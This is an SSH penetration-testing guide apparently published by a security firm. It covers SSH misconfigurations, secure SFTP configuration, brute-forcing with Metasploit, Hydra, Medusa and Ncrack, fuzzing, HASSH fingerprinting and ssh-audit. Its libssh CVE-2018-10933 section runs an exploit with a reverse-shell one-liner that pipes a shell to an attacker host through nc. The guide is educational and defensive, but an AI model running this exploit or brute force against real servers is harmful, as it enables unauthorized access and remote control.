SSH Pentesting Guide
If you’d like to suggest an amendment or contribute to this article send us an email through to
[email protected]. We’ll also do our best to propagate additions and suggestions from social
media!
Turgensec provides cost effective bespoke security and security testing to individuals and
organizations.
Our service offerings include penetration testing, open source counterintelligence, open source
intelligence and digital asset management. Contact us by clicking here.
SSH is a secure remote shell protocol used for operating network services
securely over an unsecured network. The default SSH port is 22; it's common to see it open on
servers on the Internet or on intranets.
SFTP is the SSH File Transfer Protocol, a protocol used to transfer files over an SSH connection. Most
SSH implementations also support SFTP.
SSH servers/libs
The most famous and common SSH server and client is openSSH (OpenBSD Secure Shell). It's a
strong implementation which is well maintained and was first released in 1999, so this is the
implementation you will see most often on BSD, Linux and even Windows, as it has been shipped with
Windows since Windows 10.
But openSSH is not the only implementation; here are other ones:
SSH servers:
openSSH – OpenBSD SSH, shipped in BSD, Linux distributions and Windows since Windows 10
Dropbear – SSH implementation for environments with low memory and processor resources, shipped in OpenWrt
PuTTY – SSH implementation for Windows; the client is commonly used but the use of the server is rarer
CopSSH – implementation of OpenSSH for Windows
libssh – multiplatform C library implementing the SSHv2 protocol with bindings in Python, Perl and R; it's used by KDE for sftp and by GitHub for the git SSH infrastructure
wolfSSH – SSHv2 server library written in ANSI C and targeted for embedded, RTOS, and resource-constrained environments
Apache MINA SSHD – Apache SSHD Java library based on Apache MINA
paramiko – Python SSHv2 protocol library
By default most SSH server implementations allow root login. It is advised to disable it: if
the credentials of this account leak, attackers get administrative privileges directly, and leaving it
enabled also allows attackers to conduct bruteforce attacks against a known account.
Another common SSH misconfiguration is often seen in SFTP setups. Most of the time, when
creating an SFTP server, the administrator wants users to have SFTP access to share files but not to
get a remote shell on the machine. So they think that creating a user, assigning him a placeholder
shell (like /usr/bin/nologin or /usr/bin/false) and chrooting him in a jail is enough to prevent
shell access or abuse of the whole file system. But they are wrong: a user can ask to execute a
command right after authentication, before its default command or shell is executed. So to bypass
the placeholder shell that would deny shell access, one only has to ask to execute a command (e.g.
/bin/bash) instead, just by doing:
$ ssh -v [email protected] id
...
Password:
debug1: Authentication succeeded (keyboard-interactive).
Authenticated to 192.168.1.94 ([192.168.1.94]:22).
debug1: channel 0: new [client-session]
debug1: Requesting [email protected]
debug1: Entering interactive session.
debug1: pledge: network
debug1: client_input_global_request: rtype [email protected] want_reply 0
debug1: Sending command: id
debug1: client_input_channel_req: channel 0 rtype exit-status reply 0
debug1: client_input_channel_req: channel 0 rtype [email protected] reply 0
uid=1000(noraj) gid=100(users) groups=100(users)
debug1: channel 0: free: client-session, nchannels 1
Transferred: sent 2412, received 2480 bytes, in 0.1 seconds
Bytes per second: sent 43133.4, received 44349.5
debug1: Exit status 0
Here is an example of a secure SFTP configuration (/etc/ssh/sshd_config – openSSH) for the user noraj:
Match User noraj
ChrootDirectory %h
ForceCommand internal-sftp
AllowTcpForwarding no
PermitTunnel no
X11Forwarding no
PermitTTY no
This configuration allows only SFTP: it disables shell access by forcing the start command and denying
TTY allocation, and it also disables all kinds of port forwarding and tunneling.
Authentication methods
In high-security environments it's common practice to enable only key-based or two-factor
authentication rather than single-factor password-based authentication. But often the stronger
authentication methods are enabled without disabling the weaker ones. A frequent case is enabling
publickey in the openSSH configuration and setting it as the default method but not disabling
password. So by using the verbose mode of the SSH client an attacker can see that a weaker method
is enabled:
$ ssh -v 192.168.1.94
OpenSSH_8.1p1, OpenSSL 1.1.1d 10 Sep 2019
...
debug1: Authentications that can continue: publickey,password,keyboard-interactive
For example, if an authentication failure limit is set and you never get the chance to reach the password
method, you can use the PreferredAuthentications client option to force that method.
Reviewing the SSH server configuration is necessary to check that only the expected
methods are authorized. Using verbose mode on the client can help verify
the effectiveness of the configuration.
Attack showcase
Now we'll see a set of attack examples that you can reproduce on some SSH server implementations.
I will run through a variation of "brute forcing" an SSH user password with a password
dictionary using four tools: the Metasploit framework, hydra, medusa and ncrack.
In all cases we will target the machine 192.168.1.94, on port 22 and will bruteforce only the password of
the user noraj.
Read the help messages given below if you don’t understand an argument/option.
Metasploit
With Metasploit:
Matching Modules
================
Module options (auxiliary/scanner/ssh/ssh_login):
USERNAME                  no   A specific username to authenticate as
USERPASS_FILE             no   File containing users and passwords separated by space, one pair per line
USER_AS_PASS     false    no   Try the username as the password for all users
USER_FILE                 no   File containing usernames, one per line
VERBOSE          false    yes  Whether to print output for all attempts
[*] Command shell session 1 opened (192.168.1.83:37291 -> 192.168.1.94:22) at 2020-01-02 21:33:33 +0100
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
Hydra
With Hydra:
Extract of the help message:
-l LOGIN or -L FILE login with LOGIN name, or load several logins from FILE
-p PASS or -P FILE try password PASS, or load several passwords from FILE
-e nsr try "n" null password, "s" login as pass and/or "r" reversed login
service the service to crack (see below for supported protocols)
Medusa
With Medusa:
-P [FILE] : File containing passwords to test
-e [n/s/ns] : Additional password checks ([n] No Password, [s] Password = Username)
-M [TEXT] : Name of the module to execute (without the .mod extension)
Ncrack
With ncrack:
Ncrack finished.
Exploit – LibSSH RCE
CVE-2018-10933 is the reference for a vulnerability impacting the libssh library. This vulnerability allows
unauthorized access by bypassing authentication.
libssh versions 0.6 and above have an authentication bypass vulnerability in the server code. By presenting
the server an SSH2_MSG_USERAUTH_SUCCESS message in place of the SSH2_MSG_USERAUTH_REQUEST
message which the server would expect to initiate authentication, the attacker could successfully
authenticate without any credentials. Advisory
When you find a vulnerable version with nmap you should see something like that:
searchsploit (the tool used to locally browse the Exploit-DB) shows the existing exploits available for
libssh.
searchsploit libssh
--------------------------------------------- ----------------------------------------
 Exploit Title                               | Path (/usr/share/exploitdb/)
--------------------------------------------- ----------------------------------------
 LibSSH 0.7.6 / 0.8.4 - Unauthorized Access  | exploits/linux/remote/46307.py
 libSSH - Authentication Bypass              | exploits/linux/remote/45638.py
--------------------------------------------- ----------------------------------------
Shellcodes: No Result
So we can use the exploit to execute a command on the target in order to confirm it is working.
First we start the listener on our machine: sudo ncat -nlp 80.
python /usr/share/exploitdb/exploits/linux/remote/46307.py 192.168.1.94 22 "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.1.100 80 >/tmp/f"
Fuzzing
It's possible to use a script like sshfuzz.pl to automatically fuzz a live SSH server, whatever the
implementation.
It has the advantage of being simple, but it's not very targeted, so it takes a lot of time and misses a
lot of results.
Installing the dependencies and launching the script is as easy as these two lines:
$ cpan Net::SSH2
$ ./sshfuzz.pl -H 192.168.1.94 -P 22 -u noraj -p noraj
Another automated approach that also works on any live SSH server is to use the metasploit module
auxiliary/fuzzers/ssh/ssh_version_2:
Using those tools is easy, but you have a low chance of finding something exploitable.
If you want to find more significant results and have the time to familiarize yourself with the targeted
implementation, you can opt for a manual approach.
Here the technique is to use an advanced generic fuzzer on a self-run SSH server and modify the source
code to optimize test execution time. So it requires configuring the fuzzer, configuring and building the
targeted implementation, detecting the crashes, reducing the use of resource-intensive functions to make
the fuzzing faster, increasing coverage, creating input test-cases and input dictionaries, and having a deep
understanding of the SSH protocol and of the implementation.
Here is an example from Vegard Nossum: Fuzzing the OpenSSH daemon using AFL.
"HASSH" is a network fingerprinting standard which can be used to identify specific client and server
SSH implementations. The fingerprints can be easily stored, searched and shared in the form of an
MD5 fingerprint.
HASSH is a standard that helps blue teams to detect, control and investigate brute force or credential
stuffing password attempts, exfiltration of data, network discovery and lateral movement, etc.
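An added example (not from the original article or the HASSH project) showing where the MD5 fingerprint comes from: the algorithm name-lists of the SSH_MSG_KEXINIT packet (RFC 4253 section 7.1), joined as kex;enc;mac;comp in the sender's direction, per the public HASSH specification. The KEXINIT encoder/decoder is mine, and the client packet is constructed from real algorithm names rather than captured.

```python
import hashlib
import struct

# SSH_MSG_KEXINIT layout: byte 20, 16-byte cookie, then ten name-lists
# (uint32 length + comma-separated names), a boolean and a reserved uint32.
KEXINIT_LISTS = ["kex", "hostkey", "enc_c2s", "enc_s2c", "mac_c2s", "mac_s2c",
                 "comp_c2s", "comp_s2c", "lang_c2s", "lang_s2c"]

def build_kexinit(lists, cookie=b"\x00" * 16):
    """Encode a KEXINIT payload from {list name: [algorithms]} (constructed, not captured)."""
    out = bytearray(b"\x14" + cookie)
    for name in KEXINIT_LISTS:
        names = ",".join(lists.get(name, [])).encode()
        out += struct.pack(">I", len(names)) + names
    return bytes(out + b"\x00" + struct.pack(">I", 0))  # first_kex_packet_follows, reserved

def parse_kexinit(payload):
    """Decode a KEXINIT payload back into {list name: [algorithms]}."""
    if payload[0] != 20:
        raise ValueError("not SSH_MSG_KEXINIT")
    pos, lists = 17, {}                                  # skip message byte + cookie
    for name in KEXINIT_LISTS:
        (n,) = struct.unpack_from(">I", payload, pos)
        raw = payload[pos + 4:pos + 4 + n].decode()
        lists[name] = raw.split(",") if raw else []
        pos += 4 + n
    return lists

def hassh_string(lists, side):
    """HASSH input: kex;enc;mac;comp using client-to-server lists for a client
    fingerprint (hassh) and server-to-client lists for a server one (hasshServer)."""
    d = "c2s" if side == "client" else "s2c"
    return ";".join(",".join(lists[k]) for k in ("kex", f"enc_{d}", f"mac_{d}", f"comp_{d}"))

def hassh(payload, side="client"):
    """MD5 hex digest of the HASSH string, as stored and shared by blue teams."""
    return hashlib.md5(hassh_string(parse_kexinit(payload), side).encode()).hexdigest()

# Constructed client KEXINIT using algorithm names of the kind ssh-audit lists.
CLIENT = build_kexinit({
    "kex": ["diffie-hellman-group14-sha256", "diffie-hellman-group16-sha512"],
    "hostkey": ["ssh-ed25519", "rsa-sha2-512"],
    "enc_c2s": ["aes256-ctr"], "enc_s2c": ["aes256-ctr", "aes128-ctr"],
    "mac_c2s": ["hmac-sha2-256", "hmac-sha2-512"], "mac_s2c": ["hmac-sha2-256"],
    "comp_c2s": ["none", "zlib@openssh.com"], "comp_s2c": ["none"],
})
```

Because the fingerprint covers the ordered lists, two clients offering the same algorithms in a different order produce different hassh values.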
ssh-audit is an SSH server auditing tool (banner, key exchange, encryption, MAC, compression, compatibility,
security, etc.).
It's handy for professional pentesters to quickly detect the target version and know which algorithms are
available on the remote server, to be able to give algorithm recommendations to the customer.
Example of use:
$ ssh-audit 192.168.1.94
# general
(gen) banner: SSH-2.0-OpenSSH_7.9
(gen) software: OpenSSH 7.9
(gen) compatibility: OpenSSH 7.3+, Dropbear SSH 2016.73+
(gen) compression: enabled ([email protected])
`- [info] available since OpenSSH 5.7, Dropbear SSH 2013.62
(kex) diffie-hellman-group-exchange-sha256 -- [warn] using custom size modulus (possibly weak)
`- [info] available since OpenSSH 4.4
(kex) diffie-hellman-group16-sha512 -- [info] available since OpenSSH 7.3, Dropbear SSH 2016.73
(kex) diffie-hellman-group18-sha512 -- [info] available since OpenSSH 7.3
(kex) diffie-hellman-group14-sha256 -- [info] available since OpenSSH 7.3, Dropbear SSH 2016.73
(kex) diffie-hellman-group14-sha1 -- [warn] using weak hashing algorithm
`- [info] available since OpenSSH 3.9, Dropbear SSH 0.53
# host-key algorithms
(key) rsa-sha2-512 -- [info] available since OpenSSH 7.2
(key) rsa-sha2-256 -- [info] available since OpenSSH 7.2
(key) ssh-rsa -- [info] available since OpenSSH 2.5.0, Dropbear SSH 0.28
(key) ecdsa-sha2-nistp256 -- [fail] using weak elliptic curves
`- [warn] using weak random number generator could reveal the key
`- [info] available since OpenSSH 5.7, Dropbear SSH 2013.62
(key) ssh-ed25519 -- [info] available since OpenSSH 6.5
`- [warn] using small 64-bit tag size
`- [info] available since OpenSSH 4.7
(mac) [email protected] -- [warn] using encrypt-and-MAC mode
`- [info] available since OpenSSH 6.2
(mac) hmac-sha2-256 -- [warn] using encrypt-and-MAC mode
`- [info] available since OpenSSH 5.9, Dropbear SSH 2013.56
(mac) hmac-sha2-512 -- [warn] using encrypt-and-MAC mode
`- [info] available since OpenSSH 5.9, Dropbear SSH 2013.56
(mac) hmac-sha1 -- [warn] using encrypt-and-MAC mode
`- [warn] using weak hashing algorithm
`- [info] available since OpenSSH 2.1.0, Dropbear SSH 0.28
(rec) [email protected] -- mac algorithm to remove
(rec) -hmac-sha2-256 -- mac algorithm to remove
(rec) [email protected] -- mac algorithm to remove
(rec) -hmac-sha1 -- mac algorithm to remove
(rec) [email protected] -- mac algorithm to remove
(rec) [email protected] -- mac algorithm to remove
Though (beyond this article) not much really exists for SSH-specific exploit development, many of the same
general trends apply. Many books and articles have covered the development of zero-day stack- and heap-based
exploits in detail, some of which are covered in the appropriate sections of our books and resources page.
(TLDR; Corelan and the Shellcoder's Handbook are still the best).
Some of the most notable remote SSH exploits of recent times are listed below as a quick non-comprehensive
shortlist –
Mozilla is giving recommendations to help secure an OpenSSH server in this reference guide.
Best current practices regarding secure SSH configuration are also given in a guide called Applied Crypto
Hardening. Currently, configuration examples are given for OpenSSH, Cisco ASA and Cisco IOS. The source
of the guide is also available.
Pivoting
In 2019, I published an article about network pivoting: Etat de l'art du pivoting réseau en 2019 [fr-FR].
This article addresses the following topics related to SSH:
Those methods are helpful for a professional red teamer to perform lateral movement in the target network.
This is a community article. If you want to chat to other cyber security experts, contribute articles or
collaborate with us, join our Discord channel by clicking here.
My name is Alexandre ZANNI aka noraj. I'm a cybersecurity engineer, security auditor, pentester and
ethical hacker. I'm also a staff member of the RTFM association and a developer of BlackArch Linux.
Link – pwn.by/noraj
© 2020 by TurgenSec